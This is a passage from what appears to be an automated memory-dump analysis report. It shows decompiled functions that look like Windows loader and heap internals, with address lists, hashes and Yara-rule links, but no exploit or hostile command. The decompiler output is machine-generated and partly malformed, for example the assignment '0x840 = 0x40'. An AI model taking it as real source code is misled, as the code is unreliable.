								 *((intOrPtr*)(_t237 - 0x54)) = E04A837C5( *((intOrPtr*)(_t237 - 0x74)), _t237 - 0x70);
								_t224 = _t236;
								 *(_t237 - 0x40) = _t236;
								 *(_t237 - 0x50) = _t236;
								while(1) {
									_t163 =  *(_t235 + 8);
									__eflags = _t224 - _t163;
									if(_t224 >= _t163) {
										break;
									}
									_t228 =  *0x4b37b9c; // 0x0
									_t214 = L04A64620( *((intOrPtr*)(_t237 - 0x54)) + 1,  *(_t237 - 0x48), _t228 + 0xc0000,  *(_t237 - 0x70) +  *((intOrPtr*)(_t237 - 0x54)) + 1);
									 *(_t237 - 0x78) = _t214;
									__eflags = _t214;
									if(_t214 == 0) {
										L52:
										_t193 = 0xc0000017;
										L19:
										 *(_t237 - 0x44) = _t193;
										L20:
										_t206 =  *(_t237 - 0x40);
										__eflags = _t206;
										if(_t206 == 0) {
											L26:
											__eflags = _t193;
											if(_t193 < 0) {
												E04A837F5( *((intOrPtr*)(_t237 - 0x5c)), _t237 - 0x6c);
												__eflags =  *((char*)(_t237 - 0x39));
												if( *((char*)(_t237 - 0x39)) != 0) {
													 *0x4b37b10 =  *0x4b37b10 - 8;
												}
											} else {
												_t169 =  *(_t237 - 0x68);
												__eflags = _t169;
												if(_t169 != 0) {
													 *0x4b37b04 =  *0x4b37b04 - _t169;
												}
											}
											__eflags = _t193;
											if(_t193 >= 0) {
												 *((short*)( *((intOrPtr*)(_t237 - 0x5c)) + 0x3a)) = 0xffff;
											}
											goto L30;
										}
										_t226 = _t206 * 0xc;
										__eflags = _t226;
										_t194 =  *(_t237 - 0x48);
										do {
											 *(_t237 - 0x40) = _t206 - 1;
											_t226 = _t226 - 0xc;
											 *(_t237 - 0x4c) = _t226;
											__eflags =  *(_t235 + _t226 + 0x10) & 0x00000002;
											if(( *(_t235 + _t226 + 0x10) & 0x00000002) == 0) {
												__eflags =  *(_t235 + _t226 + 0x10) & 0x00000001;
												if(( *(_t235 + _t226 + 0x10) & 0x00000001) == 0) {
													 *(_t237 - 0x68) =  *(_t237 - 0x68) + 1;
													_t210 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
													__eflags =  *((char*)(_t237 - 0x39));
													if( *((char*)(_t237 - 0x39)) == 0) {
														_t171 = _t210;
													} else {
														 *(_t237 - 0x50) =  *(_t210 +  *(_t237 - 0x58) * 4);
														L04A677F0(_t194, _t236, _t210 - 8);
														_t171 =  *(_t237 - 0x50);
													}
													L48:
													L04A677F0(_t194, _t236,  *((intOrPtr*)(_t171 - 4)));
													L46:
													_t206 =  *(_t237 - 0x40);
													_t226 =  *(_t237 - 0x4c);
													goto L24;
												}
												 *0x4b37b08 =  *0x4b37b08 + 1;
												goto L24;
											}
											_t171 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
											__eflags = _t171;
											if(_t171 != 0) {
												__eflags =  *((char*)(_t237 - 0x39));
												if( *((char*)(_t237 - 0x39)) == 0) {
													goto L48;
												}
												E04A857C2(_t171,  *((intOrPtr*)(_t235 + _t226 + 0x18)));
												goto L46;
											}
											L24:
											__eflags = _t206;
										} while (_t206 != 0);
										_t193 =  *(_t237 - 0x44);
										goto L26;
									}
									_t232 =  *(_t237 - 0x70) + 0x00000001 + _t214 &  !( *(_t237 - 0x70));
									 *(_t237 - 0x7c) = _t232;
									 *(_t232 - 4) = _t214;
									 *(_t237 - 4) = _t236;
									E04A8F3E0(_t232,  *((intOrPtr*)( *((intOrPtr*)(_t237 - 0x74)) + 8)),  *((intOrPtr*)(_t237 - 0x54)));
									_t238 = _t238 + 0xc;
									 *(_t237 - 4) = 0xfffffffe;
									_t215 =  *(_t237 - 0x48);
									__eflags = _t193;
									if(_t193 < 0) {
										L04A677F0(_t215, _t236,  *(_t237 - 0x78));
										goto L20;
									}
									__eflags =  *((char*)(_t237 - 0x39));
									if( *((char*)(_t237 - 0x39)) != 0) {
										_t233 = E04A7A44B( *(_t237 - 0x4c));
										 *(_t237 - 0x50) = _t233;
										__eflags = _t233;
										if(_t233 == 0) {
											L04A677F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x78));
											goto L52;
										}
										 *(_t233 +  *(_t237 - 0x58) * 4) =  *(_t237 - 0x7c);
										L17:
										_t234 =  *(_t237 - 0x40);
										_t218 = _t234 * 0xc;
										 *(_t218 +  *(_t237 - 0x64) + 0x14) =  *(_t237 - 0x50);
										 *(_t218 + _t235 + 0x10) = _t236;
										_t224 = _t234 + 1;
										 *(_t237 - 0x40) = _t224;
										 *(_t237 - 0x50) = _t224;
										_t193 =  *(_t237 - 0x44);
										continue;
									}
									 *(_t237 - 0x50) =  *(_t237 - 0x7c);
									goto L17;
								}
								 *_t235 = _t236;
								_t165 = 0x10 + _t163 * 0xc;
								__eflags = _t165;
								_push(_t165);
								_push(_t235);
								_push(0x23);
								_push(0xffffffff);
								_t193 = E04A896C0();
								goto L19;
							} else {
								goto L50;
							}
						}
						_t235 = _t237 - 0x38;
						 *(_t237 - 0x60) = _t235;
						goto L8;
					}
					goto L4;
				}
			}

0x04a5849b
0x04a5849b
0x04a5849b
0x04a5849b
0x04a5849d
0x04a584a2
0x04a584a7
0x04a584b1
0x04a584d8
0x00000000
0x04a584b3
0x04a584c4
0x04a584c9
0x04a584cd
0x04a584cf
0x04a584cf
0x04a584d6
0x04a584e6
0x04a584e9
0x04a584ec
0x04a584ef
0x04a584f2
0x04a584f4
0x04a584fc
0x04a58501
0x04a58506
0x04a58509
0x04a586e0
0x04a586e5
0x04a586e8
0x04a586ed
0x04a586f0
0x04a586f2
0x04aa9afd
0x04aa9b02
0x04a584da
0x04a584df
0x04a584df
0x04a586fa
0x04a586fd
0x04a586fe
0x04a58701
0x04a58706
0x04a58709
0x04a5870b
0x00000000
0x00000000
0x04a58711
0x04a58725
0x04a58727
0x04a5872a
0x04a5872c
0x04aa9af0
0x04aa9af5
0x04a58732
0x04a58732
0x04a58732
0x04a58735
0x04a58737
0x04a58515
0x04a58515
0x04a58518
0x04a5851d
0x04a58523
0x04a58527
0x04a5852b
0x04a58537
0x04a58539
0x04a5853c
0x04a5853e
0x04a5868c
0x04a58691
0x04a58699
0x04a5869b
0x04a58744
0x04a58748
0x04a586a1
0x04a586a1
0x04a586a1
0x04a586a4
0x04a586a8
0x04aa9bdf
0x04aa9bdf
0x04a586ae
0x04a586b0
0x00000000
0x04a586b6
0x00000000
0x04aa9be9
0x04a586b0
0x04a58544
0x04a5854a
0x04a5854d
0x04a58551
0x04a5876e
0x04a58778
0x04a5877b
0x04a58780
0x04a58557
0x04a58557
0x04a5855d
0x04a5855d
0x04a5856b
0x04a5856e
0x04a58570
0x04a58573
0x04a58576
0x04a58576
0x04a58579
0x04a5857b
0x00000000
0x00000000
0x04a58581
0x04a585a0
0x04a585a2
0x04a585a5
0x04a585a7
0x04aa9b1b
0x04aa9b1b
0x04a5862e
0x04a5862e
0x04a58631
0x04a58631
0x04a58634
0x04a58636
0x04a58669
0x04a58669
0x04a5866b
0x04aa9bbf
0x04aa9bc4
0x04aa9bc8
0x04aa9bce
0x04aa9bce
0x04a58671
0x04a58671
0x04a58674
0x04a58676
0x04aa9bae
0x04aa9bae
0x04a58676
0x04a5867c
0x04a5867e
0x04a58688
0x04a58688
0x00000000
0x04a5867e
0x04a58638
0x04a58638
0x04a5863b
0x04a5863e
0x04a5863f
0x04a58642
0x04a58645
0x04a58648
0x04a5864d
0x04aa9b69
0x04aa9b6e
0x04aa9b7b
0x04aa9b81
0x04aa9b85
0x04aa9b89
0x04aa9ba7
0x04aa9b8b
0x04aa9b91
0x04aa9b9a
0x04aa9b9f
0x04aa9b9f
0x04a58788
0x04a5878d
0x04a58763
0x04a58763
0x04a58766
0x00000000
0x04a58766
0x04aa9b70
0x00000000
0x04aa9b70
0x04a58656
0x04a5865a
0x04a5865c
0x04a58752
0x04a58756
0x00000000
0x00000000
0x04a5875e
0x00000000
0x04a5875e
0x04a58662
0x04a58662
0x04a58662
0x04a58666
0x00000000
0x04a58666
0x04a585b7
0x04a585b9
0x04a585bc
0x04a585bf
0x04a585cc
0x04a585d1
0x04a585d4
0x04a585db
0x04a585de
0x04a585e0
0x04aa9b5f
0x00000000
0x04aa9b5f
0x04a585e6
0x04a585ea
0x04a586c3
0x04a586c5
0x04a586c8
0x04a586ca
0x04aa9b16
0x00000000
0x04aa9b16
0x04a586d6
0x04a585f6
0x04a585f6
0x04a585f9
0x04a58602
0x04a58606
0x04a5860a
0x04a5860b
0x04a5860e
0x04a58611
0x00000000
0x04a58611
0x04a585f3
0x00000000
0x04a585f3
0x04a58619
0x04a5861e
0x04a5861e
0x04a58621
0x04a58622
0x04a58623
0x04a58625
0x04a5862c
0x00000000
0x04a5873d
0x00000000
0x04a5873d
0x04a58737
0x04a5850f
0x04a58512
0x00000000
0x04a58512
0x00000000
0x04a584d6

Memory Dump Source

Source File: 00000005.00000002.777992864.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: true

Associated: 00000005.00000002.778441591.0000000004B3B000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.778452697.0000000004B3F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 68efd6b4a8a4e4c393fc9390842fb49b8f38032f947fcd91791f4457922eab6b
Instruction ID: 332974887cdae6ebe83424ff73fdfe3950c71f8700dee219028c51f354420f75
Opcode Fuzzy Hash: 68efd6b4a8a4e4c393fc9390842fb49b8f38032f947fcd91791f4457922eab6b
Instruction Fuzzy Hash: 69B16FB4E00209DFDB14EF99CA80AAEBBB9FF48304F10452EE805AB655E774BD55CB50

Uniqueness

Uniqueness Score: -1.00%

Function 04A7513A, Relevance: .3, Instructions: 258
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E04A7513A(intOrPtr __ecx, void* __edx) {
				signed int _v8;
				signed char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				char _v63;
				char _v64;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed char* _v92;
				signed int _v100;
				signed int _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t157;
				signed int _t159;
				signed int _t160;
				unsigned int* _t161;
				intOrPtr _t165;
				signed int _t172;
				signed char* _t181;
				intOrPtr _t189;
				intOrPtr* _t200;
				signed int _t202;
				signed int _t203;
				char _t204;
				signed int _t207;
				signed int _t208;
				void* _t209;
				intOrPtr _t210;
				signed int _t212;
				signed int _t214;
				signed int _t221;
				signed int _t222;
				signed int _t226;
				intOrPtr* _t232;
				signed int _t233;
				signed int _t234;
				intOrPtr _t237;
				intOrPtr _t238;
				intOrPtr _t240;
				void* _t245;
				signed int _t246;
				signed int _t247;
				void* _t248;
				void* _t251;
				void* _t252;
				signed int _t253;
				signed int _t255;
				signed int _t256;

				_t255 = (_t253 & 0xfffffff8) - 0x6c;
				_v8 =  *0x4b3d360 ^ _t255;
				_v32 = _v32 & 0x00000000;
				_t251 = __edx;
				_t237 = __ecx;
				_t212 = 6;
				_t245 =  &_v84;
				_t207 =  *((intOrPtr*)(__ecx + 0x48));
				_v44 =  *((intOrPtr*)(__edx + 0xc8));
				_v48 = __ecx;
				_v36 = _t207;
				_t157 = memset(_t245, 0, _t212 << 2);
				_t256 = _t255 + 0xc;
				_t246 = _t245 + _t212;
				if(_t207 == 2) {
					_t247 =  *(_t237 + 0x60);
					_t208 =  *(_t237 + 0x64);
					_v63 =  *((intOrPtr*)(_t237 + 0x4c));
					_t159 =  *((intOrPtr*)(_t237 + 0x58));
					_v104 = _t159;
					_v76 = _t159;
					_t160 =  *((intOrPtr*)(_t237 + 0x5c));
					_v100 = _t160;
					_v72 = _t160;
					L19:
					_v80 = _t208;
					_v84 = _t247;
					L8:
					_t214 = 0;
					if( *(_t237 + 0x74) > 0) {
						_t82 = _t237 + 0x84; // 0x124
						_t161 = _t82;
						_v92 = _t161;
						while( *_t161 >> 0x1f != 0) {
							_t200 = _v92;
							if( *_t200 == 0x80000000) {
								break;
							}
							_t214 = _t214 + 1;
							_t161 = _t200 + 0x10;
							_v92 = _t161;
							if(_t214 <  *(_t237 + 0x74)) {
								continue;
							}
							goto L9;
						}
						_v88 = _t214 << 4;
						_v40 = _t237 +  *((intOrPtr*)(_v88 + _t237 + 0x78));
						_t165 = 0;
						asm("adc eax, [ecx+edx+0x7c]");
						_v24 = _t165;
						_v28 = _v40;
						_v20 =  *((intOrPtr*)(_v88 + _t237 + 0x80));
						_t221 = _v40;
						_v16 =  *_v92;
						_v32 =  &_v28;
						if( *(_t237 + 0x4e) >> 0xf == 0) {
							goto L9;
						}
						_t240 = _v48;
						if( *_v92 != 0x80000000) {
							goto L9;
						}
						 *((intOrPtr*)(_t221 + 8)) = 0;
						 *((intOrPtr*)(_t221 + 0xc)) = 0;
						 *((intOrPtr*)(_t221 + 0x14)) = 0;
						 *((intOrPtr*)(_t221 + 0x10)) = _v20;
						_t226 = 0;
						_t181 = _t251 + 0x66;
						_v88 = 0;
						_v92 = _t181;
						do {
							if( *((char*)(_t181 - 2)) == 0) {
								goto L31;
							}
							_t226 = _v88;
							if(( *_t181 & 0x000000ff) == ( *(_t240 + 0x4e) & 0x7fff)) {
								_t181 = E04A8D0F0(1, _t226 + 0x20, 0);
								_t226 = _v40;
								 *(_t226 + 8) = _t181;
								 *((intOrPtr*)(_t226 + 0xc)) = 0;
								L34:
								if(_v44 == 0) {
									goto L9;
								}
								_t210 = _v44;
								_t127 = _t210 + 0x1c; // 0x1c
								_t249 = _t127;
								E04A62280(_t181, _t127);
								 *(_t210 + 0x20) =  *( *[fs:0x18] + 0x24);
								_t185 =  *((intOrPtr*)(_t210 + 0x94));
								if( *((intOrPtr*)(_t210 + 0x94)) != 0) {
									L04A677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t185);
								}
								_t189 = L04A64620(_t226,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v20 + 0x10);
								 *((intOrPtr*)(_t210 + 0x94)) = _t189;
								if(_t189 != 0) {
									 *((intOrPtr*)(_t189 + 8)) = _v20;
									 *( *((intOrPtr*)(_t210 + 0x94)) + 0xc) = _v16;
									_t232 =  *((intOrPtr*)(_t210 + 0x94));
									 *_t232 = _t232 + 0x10;
									 *(_t232 + 4) =  *(_t232 + 4) & 0x00000000;
									E04A8F3E0( *((intOrPtr*)( *((intOrPtr*)(_t210 + 0x94)))), _v28, _v20);
									_t256 = _t256 + 0xc;
								}
								 *(_t210 + 0x20) =  *(_t210 + 0x20) & 0x00000000;
								E04A5FFB0(_t210, _t249, _t249);
								_t222 = _v76;
								_t172 = _v80;
								_t208 = _v84;
								_t247 = _v88;
								L10:
								_t238 =  *((intOrPtr*)(_t251 + 0x1c));
								_v44 = _t238;
								if(_t238 != 0) {
									 *0x4b3b1e0(_v48 + 0x38, _v36, _v63, _t172, _t222, _t247, _t208, _v32,  *((intOrPtr*)(_t251 + 0x20)));
									_v44();
								}
								_pop(_t248);
								_pop(_t252);
								_pop(_t209);
								return E04A8B640(0, _t209, _v8 ^ _t256, _t238, _t248, _t252);
							}
							_t181 = _v92;
							L31:
							_t226 = _t226 + 1;
							_t181 =  &(_t181[0x18]);
							_v88 = _t226;
							_v92 = _t181;
						} while (_t226 < 4);
						goto L34;
					}
					L9:
					_t172 = _v104;
					_t222 = _v100;
					goto L10;
				}
				_t247 = _t246 | 0xffffffff;
				_t208 = _t247;
				_v84 = _t247;
				_v80 = _t208;
				if( *((intOrPtr*)(_t251 + 0x4c)) == _t157) {
					_t233 = _v72;
					_v105 = _v64;
					_t202 = _v76;
				} else {
					_t204 =  *((intOrPtr*)(_t251 + 0x4d));
					_v105 = 1;
					if(_v63 <= _t204) {
						_v63 = _t204;
					}
					_t202 = _v76 |  *(_t251 + 0x40);
					_t233 = _v72 |  *(_t251 + 0x44);
					_t247 =  *(_t251 + 0x38);
					_t208 =  *(_t251 + 0x3c);
					_v76 = _t202;
					_v72 = _t233;
					_v84 = _t247;
					_v80 = _t208;
				}
				_v104 = _t202;
				_v100 = _t233;
				if( *((char*)(_t251 + 0xc4)) != 0) {
					_t237 = _v48;
					_v105 = 1;
					if(_v63 <=  *((intOrPtr*)(_t251 + 0xc5))) {
						_v63 =  *((intOrPtr*)(_t251 + 0xc5));
						_t237 = _v48;
					}
					_t203 = _t202 |  *(_t251 + 0xb8);
					_t234 = _t233 |  *(_t251 + 0xbc);
					_t247 = _t247 &  *(_t251 + 0xb0);
					_t208 = _t208 &  *(_t251 + 0xb4);
					_v104 = _t203;
					_v76 = _t203;
					_v100 = _t234;
					_v72 = _t234;
					_v84 = _t247;
					_v80 = _t208;
				}
				if(_v105 == 0) {
					_v36 = _v36 & 0x00000000;
					_t208 = 0;
					_t247 = 0;
					 *(_t237 + 0x74) =  *(_t237 + 0x74) & 0;
					goto L19;
				} else {
					_v36 = 1;
					goto L8;
				}
			}

0x04a75142
0x04a7514c
0x04a75150
0x04a75157
0x04a75159
0x04a7515e
0x04a75165
0x04a75169
0x04a7516c
0x04a75172
0x04a75176
0x04a7517a
0x04a7517a
0x04a7517a
0x04a7517f
0x04ab6d8b
0x04ab6d8e
0x04ab6d91
0x04ab6d95
0x04ab6d98
0x04ab6d9c
0x04ab6da0
0x04ab6da3
0x04ab6da7
0x04ab6e26
0x04ab6e26
0x04ab6e2a
0x04a751f9
0x04a751f9
0x04a751fe
0x04ab6e33
0x04ab6e33
0x04ab6e39
0x04ab6e3d
0x04ab6e46
0x04ab6e50
0x00000000
0x00000000
0x04ab6e52
0x04ab6e53
0x04ab6e56
0x04ab6e5d
0x00000000
0x00000000
0x00000000
0x04ab6e5f
0x04ab6e67
0x04ab6e77
0x04ab6e7f
0x04ab6e80
0x04ab6e88
0x04ab6e90
0x04ab6e9f
0x04ab6ea5
0x04ab6ea9
0x04ab6eb1
0x04ab6ebf
0x00000000
0x00000000
0x04ab6ecf
0x04ab6ed3
0x00000000
0x00000000
0x04ab6edb
0x04ab6ede
0x04ab6ee1
0x04ab6ee8
0x04ab6eeb
0x04ab6eed
0x04ab6ef0
0x04ab6ef4
0x04ab6ef8
0x04ab6efc
0x00000000
0x00000000
0x04ab6f0d
0x04ab6f11
0x04ab6f32
0x04ab6f37
0x04ab6f3b
0x04ab6f3e
0x04ab6f41
0x04ab6f46
0x00000000
0x00000000
0x04ab6f4c
0x04ab6f50
0x04ab6f50
0x04ab6f54
0x04ab6f62
0x04ab6f65
0x04ab6f6d
0x04ab6f7b
0x04ab6f7b
0x04ab6f93
0x04ab6f98
0x04ab6fa0
0x04ab6fa6
0x04ab6fb3
0x04ab6fb6
0x04ab6fbf
0x04ab6fc1
0x04ab6fd5
0x04ab6fda
0x04ab6fda
0x04ab6fdd
0x04ab6fe2
0x04ab6fe7
0x04ab6feb
0x04ab6fef
0x04ab6ff3
0x04a7520c
0x04a7520c
0x04a7520f
0x04a75215
0x04a75234
0x04a7523a
0x04a7523a
0x04a75244
0x04a75245
0x04a75246
0x04a75251
0x04a75251
0x04ab6f13
0x04ab6f17
0x04ab6f17
0x04ab6f18
0x04ab6f1b
0x04ab6f1f
0x04ab6f23
0x00000000
0x04ab6f28
0x04a75204
0x04a75204
0x04a75208
0x00000000
0x04a75208
0x04a75185
0x04a75188
0x04a7518a
0x04a7518e
0x04a75195
0x04ab6db1
0x04ab6db5
0x04ab6db9
0x04a7519b
0x04a7519b
0x04a7519e
0x04a751a7
0x04a751a9
0x04a751a9
0x04a751b5
0x04a751b8
0x04a751bb
0x04a751be
0x04a751c1
0x04a751c5
0x04a751c9
0x04a751cd
0x04a751cd
0x04a751d8
0x04a751dc
0x04a751e0
0x04ab6dcc
0x04ab6dd0
0x04ab6dd5
0x04ab6ddd
0x04ab6de1
0x04ab6de1
0x04ab6de5
0x04ab6deb
0x04ab6df1
0x04ab6df7
0x04ab6dfd
0x04ab6e01
0x04ab6e05
0x04ab6e09
0x04ab6e0d
0x04ab6e11
0x04ab6e11
0x04a751eb
0x04ab6e1a
0x04ab6e1f
0x04ab6e21
0x04ab6e23
0x00000000
0x04a751f1
0x04a751f1
0x00000000
0x04a751f1

Memory Dump Source

Source File: 00000005.00000002.777992864.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: true

Associated: 00000005.00000002.778441591.0000000004B3B000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.778452697.0000000004B3F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a76192b969980b4294099bb947f018cdd352fbd37ec59bc8a5ea15543f4a26d1
Instruction ID: bddf27e84c300482d459d077b12b8a36f361227e3cad484bf2c571964f6186df
Opcode Fuzzy Hash: a76192b969980b4294099bb947f018cdd352fbd37ec59bc8a5ea15543f4a26d1
Instruction Fuzzy Hash: A6C123756093809FD354CF28C980A5AFBF1BF88308F14496EF9998B352D775E845CB82

Uniqueness

Uniqueness Score: -1.00%

Function 04A703E2, Relevance: .3, Instructions: 254
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E04A703E2(signed int __ecx, signed int __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				intOrPtr _v40;
				signed int _v44;
				signed int _v48;
				char _v52;
				char _v56;
				char _v64;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t56;
				signed int _t58;
				char* _t64;
				intOrPtr _t65;
				signed int _t74;
				signed int _t79;
				char* _t83;
				intOrPtr _t84;
				signed int _t93;
				signed int _t94;
				signed char* _t95;
				signed int _t99;
				signed int _t100;
				signed char* _t101;
				signed int _t105;
				signed int _t119;
				signed int _t120;
				void* _t122;
				signed int _t123;
				signed int _t127;

				_v8 =  *0x4b3d360 ^ _t127;
				_t119 = __ecx;
				_t105 = __edx;
				_t118 = 0;
				_v20 = __edx;
				_t120 =  *(__ecx + 0x20);
				if(E04A70548(__ecx, 0) != 0) {
					_t56 = 0xc000022d;
					L23:
					return E04A8B640(_t56, _t105, _v8 ^ _t127, _t118, _t119, _t120);
				} else {
					_v12 = _v12 | 0xffffffff;
					_t58 = _t120 + 0x24;
					_t109 =  *(_t120 + 0x18);
					_t118 = _t58;
					_v16 = _t58;
					E04A5B02A( *(_t120 + 0x18), _t118, 0x14a5);
					_v52 = 0x18;
					_v48 = 0;
					0x840 = 0x40;
					if( *0x4b37c1c != 0) {
					}
					_v40 = 0x840;
					_v44 = _t105;
					_v36 = 0;
					_v32 = 0;
					if(E04A67D50() != 0) {
						_t64 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					} else {
						_t64 = 0x7ffe0384;
					}
					if( *_t64 != 0) {
						_t65 =  *[fs:0x30];
						__eflags =  *(_t65 + 0x240) & 0x00000004;
						if(( *(_t65 + 0x240) & 0x00000004) != 0) {
							_t100 = E04A67D50();
							__eflags = _t100;
							if(_t100 == 0) {
								_t101 = 0x7ffe0385;
							} else {
								_t101 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
							}
							__eflags =  *_t101 & 0x00000020;
							if(( *_t101 & 0x00000020) != 0) {
								_t118 = _t118 | 0xffffffff;
								_t109 = 0x1485;
								E04AC7016(0x1485, _t118, 0xffffffff, 0xffffffff, 0, 0);
							}
						}
					}
					_t105 = 0;
					while(1) {
						_push(0x60);
						_push(5);
						_push( &_v64);
						_push( &_v52);
						_push(0x100021);
						_push( &_v12);
						_t122 = E04A89830();
						if(_t122 >= 0) {
							break;
						}
						__eflags = _t122 - 0xc0000034;
						if(_t122 == 0xc0000034) {
							L38:
							_t120 = 0xc0000135;
							break;
						}
						__eflags = _t122 - 0xc000003a;
						if(_t122 == 0xc000003a) {
							goto L38;
						}
						__eflags = _t122 - 0xc0000022;
						if(_t122 != 0xc0000022) {
							break;
						}
						__eflags = _t105;
						if(__eflags != 0) {
							break;
						}
						_t109 = _t119;
						_t99 = E04AC69A6(_t119, __eflags);
						__eflags = _t99;
						if(_t99 == 0) {
							break;
						}
						_t105 = _t105 + 1;
					}
					if( !_t120 >= 0) {
						L22:
						_t56 = _t120;
						goto L23;
					}
					if( *0x4b37c04 != 0) {
						_t118 = _v12;
						_t120 = E04ACA7AC(_t119, _t118, _t109);
						__eflags = _t120;
						if(_t120 >= 0) {
							goto L10;
						}
						__eflags =  *0x4b37bd8;
						if( *0x4b37bd8 != 0) {
							L20:
							if(_v12 != 0xffffffff) {
								_push(_v12);
								E04A895D0();
							}
							goto L22;
						}
					}
					L10:
					_push(_v12);
					_t105 = _t119 + 0xc;
					_push(0x1000000);
					_push(0x10);
					_push(0);
					_push(0);
					_push(0xf);
					_push(_t105);
					_t120 = E04A899A0();
					if(_t120 < 0) {
						__eflags = _t120 - 0xc000047e;
						if(_t120 == 0xc000047e) {
							L51:
							_t74 = E04AC3540(_t120);
							_t119 = _v16;
							_t120 = _t74;
							L52:
							_t118 = 0x1485;
							E04A4B1E1(_t120, 0x1485, 0, _t119);
							goto L20;
						}
						__eflags = _t120 - 0xc000047f;
						if(_t120 == 0xc000047f) {
							goto L51;
						}
						__eflags = _t120 - 0xc0000462;
						if(_t120 == 0xc0000462) {
							goto L51;
						}
						_t119 = _v16;
						__eflags = _t120 - 0xc0000017;
						if(_t120 != 0xc0000017) {
							__eflags = _t120 - 0xc000009a;
							if(_t120 != 0xc000009a) {
								__eflags = _t120 - 0xc000012d;
								if(_t120 != 0xc000012d) {
									_v28 = _t119;
									_push( &_v56);
									_push(1);
									_v24 = _t120;
									_push( &_v28);
									_push(1);
									_push(2);
									_push(0xc000007b);
									_t79 = E04A8AAF0();
									__eflags = _t79;
									if(_t79 >= 0) {
										__eflags =  *0x4b38474 - 3;
										if( *0x4b38474 != 3) {
											 *0x4b379dc =  *0x4b379dc + 1;
										}
									}
								}
							}
						}
						goto L52;
					}
					if(E04A67D50() != 0) {
						_t83 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					} else {
						_t83 = 0x7ffe0384;
					}
					if( *_t83 != 0) {
						_t84 =  *[fs:0x30];
						__eflags =  *(_t84 + 0x240) & 0x00000004;
						if(( *(_t84 + 0x240) & 0x00000004) != 0) {
							_t94 = E04A67D50();
							__eflags = _t94;
							if(_t94 == 0) {
								_t95 = 0x7ffe0385;
							} else {
								_t95 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
							}
							__eflags =  *_t95 & 0x00000020;
							if(( *_t95 & 0x00000020) != 0) {
								E04AC7016(0x1486, _t118, 0xffffffff, 0xffffffff, 0, 0);
							}
						}
					}
					if(( *(_t119 + 0x10) & 0x00000100) == 0) {
						if( *0x4b38708 != 0) {
							_t118 =  *0x7ffe0330;
							_t123 =  *0x4b37b00; // 0x0
							asm("ror esi, cl");
							 *0x4b3b1e0(_v12, _v20, 0x20);
							_t93 =  *(_t123 ^  *0x7ffe0330)();
							_t50 = _t93 + 0x3ffffddb; // 0x3ffffddb
							asm("sbb esi, esi");
							_t120 =  ~_t50 & _t93;
						} else {
							_t120 = 0;
						}
					}
					if( !_t120 >= 0) {
						L19:
						_push( *_t105);
						E04A895D0();
						 *_t105 =  *_t105 & 0x00000000;
						goto L20;
					}
					_t120 = E04A57F65(_t119);
					if( *((intOrPtr*)(_t119 + 0x60)) != 0) {
						__eflags = _t120;
						if(_t120 < 0) {
							goto L19;
						}
						 *(_t119 + 0x64) = _v12;
						goto L22;
					}
					goto L19;
				}
			}

0x04a703f1
0x04a703f7
0x04a703f9
0x04a703fb
0x04a703fd
0x04a70400
0x04a7040a
0x04ab4c7a
0x04a70537
0x04a70547
0x04a70410
0x04a70410
0x04a70414
0x04a70417
0x04a7041a
0x04a70421
0x04a70424
0x04a7042b
0x04a7043b
0x04a7043e
0x04a7043f
0x04a7043f
0x04a70446
0x04a70449
0x04a7044c
0x04a7044f
0x04a70459
0x04ab4c8d
0x04a7045f
0x04a7045f
0x04a7045f
0x04a70467
0x04ab4c97
0x04ab4c9d
0x04ab4ca4
0x04ab4caa
0x04ab4caf
0x04ab4cb1
0x04ab4cc3
0x04ab4cb3
0x04ab4cbc
0x04ab4cbc
0x04ab4cc8
0x04ab4ccb
0x04ab4cd7
0x04ab4cda
0x04ab4cdf
0x04ab4cdf
0x04ab4ccb
0x04ab4ca4
0x04a7046d
0x04a7046f
0x04a7046f
0x04a70471
0x04a70476
0x04a7047a
0x04a7047b
0x04a70483
0x04a70489
0x04a7048d
0x00000000
0x00000000
0x04ab4ce9
0x04ab4cef
0x04ab4d22
0x04ab4d22
0x00000000
0x04ab4d22
0x04ab4cf1
0x04ab4cf7
0x00000000
0x00000000
0x04ab4cf9
0x04ab4cff
0x00000000
0x00000000
0x04ab4d05
0x04ab4d07
0x00000000
0x00000000
0x04ab4d0d
0x04ab4d0f
0x04ab4d14
0x04ab4d16
0x00000000
0x00000000
0x04ab4d1c
0x04ab4d1c
0x04a70499
0x04a70535
0x04a70535
0x00000000
0x04a70535
0x04a704a6
0x04ab4d2c
0x04ab4d37
0x04ab4d39
0x04ab4d3b
0x00000000
0x00000000
0x04ab4d41
0x04ab4d48
0x04a70527
0x04a7052b
0x04a7052d
0x04a70530
0x04a70530
0x00000000
0x04a7052b
0x04ab4d4e
0x04a704ac
0x04a704ac
0x04a704af
0x04a704b2
0x04a704b7
0x04a704b9
0x04a704bb
0x04a704bd
0x04a704bf
0x04a704c5
0x04a704c9
0x04ab4d53
0x04ab4d59
0x04ab4db9
0x04ab4dba
0x04ab4dbf
0x04ab4dc2
0x04ab4dc4
0x04ab4dc7
0x04ab4dce
0x00000000
0x04ab4dce
0x04ab4d5b
0x04ab4d61
0x00000000
